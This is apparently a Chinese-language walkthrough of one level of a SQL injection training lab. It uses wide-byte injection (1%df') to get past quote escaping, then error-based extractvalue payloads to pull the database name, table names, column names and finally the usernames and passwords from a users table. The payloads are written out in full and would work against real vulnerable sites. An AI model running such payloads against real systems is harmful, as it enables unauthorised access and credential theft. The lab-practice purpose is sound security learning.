作者:文女2010_532 | 来源:互联网 | 2023-10-13 18:50
这一关和上一关一样都是get请求形式的我们首先判断一下注入类型是否为数字型输入如下id1and12正常回显了说明属于字符型然后判断是单引还是双引输入1回显如下不好遇到转义了
这一关和上一关一样都是get请求形式的
我们首先判断一下注入类型是否为数字型 输入如下
id=1 and 1=2

正常回显了 说明属于字符型
然后判断是单引还是双引 输入1'
回显如下

不好 遇到转义了 需要宽字节注入帮助逃逸才行 于是将注入语句改成了1%df'
回显如下

出现报错信息 从报错信息中我们可以知道的是这个注入类型就是单引号注入 我们尝试着佐证一下
输入1%df'--+ 回显如下
正常回显 说明就是单引号注入 开始我们的爆破之旅吧
这一关我们使用报错注入解题
首先爆库 输入如下
id=1%df' and extractvalue(1,concat(0x7e,database(),0x7e))--+
回显如下

接着进行爆表操作 输入如下
id=1%df' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+
回显如下

接着进行爆字段操作 输入如下
id=1%df' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database()),0x7e))--+
回显如下

然后进行爆用户名和密码操作 输入如下
id=1%df' and extractvalue(1,concat(0x7e,(select group_concat(username,password) from users),0x7e))--+
回显如下

成功解题 嗨嗨!!